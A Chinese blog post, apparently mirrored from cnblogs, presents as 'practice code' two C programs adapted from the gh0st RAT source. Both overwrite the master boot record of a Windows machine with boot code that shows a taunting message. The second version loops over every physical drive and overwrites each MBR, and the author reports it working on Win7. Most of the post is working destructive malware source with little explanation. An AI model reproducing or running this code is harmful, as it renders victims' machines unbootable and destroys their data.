zoukankan      html  css  js  c++  java
  • 对硬盘扇区的操作,练手代码

    /*
    
    //KILLMBR.c
    源自gh0st远控3.6版的源码中对版权保护的硬盘锁,只做了少量修改
    通过这一篇文章了解 http://blog.csdn.net/qiurisuixiang/article/details/7314882 
    2013/7/11 by赫
    */
    #include "stdafx.h"
    int KillMBR() ;
    unsigned char scode[] = 
    "xb8x12x00xcdx10xbdx18x7cxb9x18x00xb8x01x13xbbx0c" 
    "x00xbax1dx0excdx10xe2xfex49x20x61x6dx20x48x45x20" 
    "x46x75x63x6bx20x79x6fx75x0Dx3Cx3Cx3Cx2Bx3Ex3Ex3E"; 
    
    int _tmain(int argc, _TCHAR* argv[])
    {
        _wsetlocale(LC_ALL, L"chs");
        wchar_t YesOrNo;
        wprintf(L"***********************************");
        wprintf(L"此程序有高度危险性是否要执行?
    ");
        wprintf(L"继续请输入Y(大写),输入其他退出
    ");
        wprintf(L"By赫");
        wprintf(L"***********************************");
        YesOrNo = getwchar();
    
        if(YesOrNo == L'Y')
        {
            KillMBR();
        }
    
        getwchar();
    
        getwchar();
        return 0;
    }
     
    int KillMBR() 
    { 
        HANDLE hDevice; 
        DWORD dwBytesWritten, dwBytesReturned; 
        BYTE pMBR[512] = {0}; 
         
        // 重新构造MBR 
        memcpy(pMBR, scode, sizeof(scode) - 1); 
        pMBR[510] = 0x55; 
        pMBR[511] = 0xAA; 
         
        hDevice = CreateFile 
            ( 
            L"\\.\PHYSICALDRIVE0", 
            GENERIC_READ | GENERIC_WRITE, 
            FILE_SHARE_READ | FILE_SHARE_WRITE, 
            NULL, 
            OPEN_EXISTING, 
            0, 
            NULL 
            ); 
        if (hDevice == INVALID_HANDLE_VALUE) 
            return -1; 
        DeviceIoControl 
            ( 
            hDevice,  
            FSCTL_LOCK_VOLUME,  
            NULL,  
            0,  
            NULL,  
            0,  
            &dwBytesReturned,  
            NULL 
            ); 
        // 写入病毒内容 
        WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL); 
        DeviceIoControl 
            ( 
            hDevice,  
            FSCTL_UNLOCK_VOLUME,  
            NULL,  
            0,  
            NULL,  
            0,  
            &dwBytesReturned,  
            NULL 
            ); 
        CloseHandle(hDevice); 
     
        ExitProcess(-1); 
        return 0; 
    } 

          https://github.com/HeMinzhang/Hello-World/blob/master/windows/KillMBR/KillMBR.cpp 我的github

    unsignedcharscode[] 第2段“x49x20x61x6dx20x48x45x20 开始为程序成功运行后,再次开机在屏幕上显示的字符
     
    关键一点是CreateFile打开\\.\PHYSICALDRIVE0 为第一扇区,然后DeviceIoControl对设备执行操作,WriteFile写入到扇区,
    DeviceIoControl再次操作
     
    此类MBR程序,运行时对MBR进行破坏几年前就已被国内杀毒厂商拦截
     
    因为在win7下测试无效所以我改良了程序,如下      有效,只是显示字符不正确
    /*
    源自gh0st远控3.6版的源码中对版权保护的硬盘锁,只做了少量修改
    通过这一篇文章了解 http://blog.csdn.net/qiurisuixiang/article/details/7314882 
    2013/7/11 by赫
    */
    #include "stdafx.h"
    int KillMBR() ;
    
    unsigned char scode[] = 
    "xb8x12x00xcdx10xbdx18x7cxb9x18x00xb8x01x13xbbx0c" 
    "x00xbax1dx0excdx10xe2xfex49x20x61x6dx20x48x45x20" 
    "x46x75x63x6bx20x79x6fx75x0Dx3Cx3Cx3Cx2Bx3Ex3Ex3E"; 
    
    DWORD Sr = 10;
    int _tmain(int argc, _TCHAR* argv[])
    {
        while(1)
        {
            if(Sr == 0)
            {
                Sr = 11;
                KillMBR();
            }
            else if(Sr < 11)
            {
                Sr--;
                KillMBR();
            }
            else
            {
                KillMBR();
                Sr++;
            }
        }
        return 0;
    }
     
    int KillMBR() 
    { 
        HANDLE hDevice; 
        DWORD dwBytesWritten, dwBytesReturned; 
        BYTE pMBR[512] = {0}; 
         
        wchar_t MBR_Path[128] ;
        // 重新构造MBR 
        memcpy(pMBR, scode, sizeof(scode) - 1); 
        pMBR[510] = 0x55; 
        pMBR[511] = 0xAA; 
         
        StringCchPrintf(MBR_Path,128,_T("\\.\PHYSICALDRIVE%d%c"),Sr,_T(''));
     
        hDevice = CreateFile 
            ( 
            MBR_Path, 
            GENERIC_READ | GENERIC_WRITE, 
            FILE_SHARE_READ | FILE_SHARE_WRITE, 
            NULL, 
            OPEN_EXISTING, 
            0, 
            NULL 
            ); 
        if (hDevice == INVALID_HANDLE_VALUE) 
            return -1; 
        DeviceIoControl 
            ( 
            hDevice,  
            FSCTL_LOCK_VOLUME,  
            NULL,  
            0,  
            NULL,  
            0,  
            &dwBytesReturned,  
            NULL 
            ); 
    
        // 写入病毒内容 
        WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL); 
        DeviceIoControl 
            ( 
            hDevice,  
            FSCTL_UNLOCK_VOLUME,  
            NULL,  
            0,  
            NULL,  
            0,  
            &dwBytesReturned,  
            NULL 
            ); 
        CloseHandle(hDevice); 
        //ExitProcess(-1); 
    
        return 0; 
    } 

    依次读取所有扇区然后Clean之

  • 相关阅读:
    Delphi XE5 android 蓝牙通讯传输
    Delphi XE5 android toast
    Delphi XE5 android openurl(转)
    Delphi XE5 如何设计并使用FireMonkeyStyle(转)
    Delphi XE5 android 捕获几个事件
    Delphi XE5 android listview
    Delphi XE5 android 黑屏的临时解决办法
    Delphi XE5 android popumenu
    Delphi XE5 android 获取网络状态
    Delphi XE5 android 获取电池电量
  • 原文地址:https://www.cnblogs.com/zero5/p/3185373.html
Copyright © 2011-2022 走看看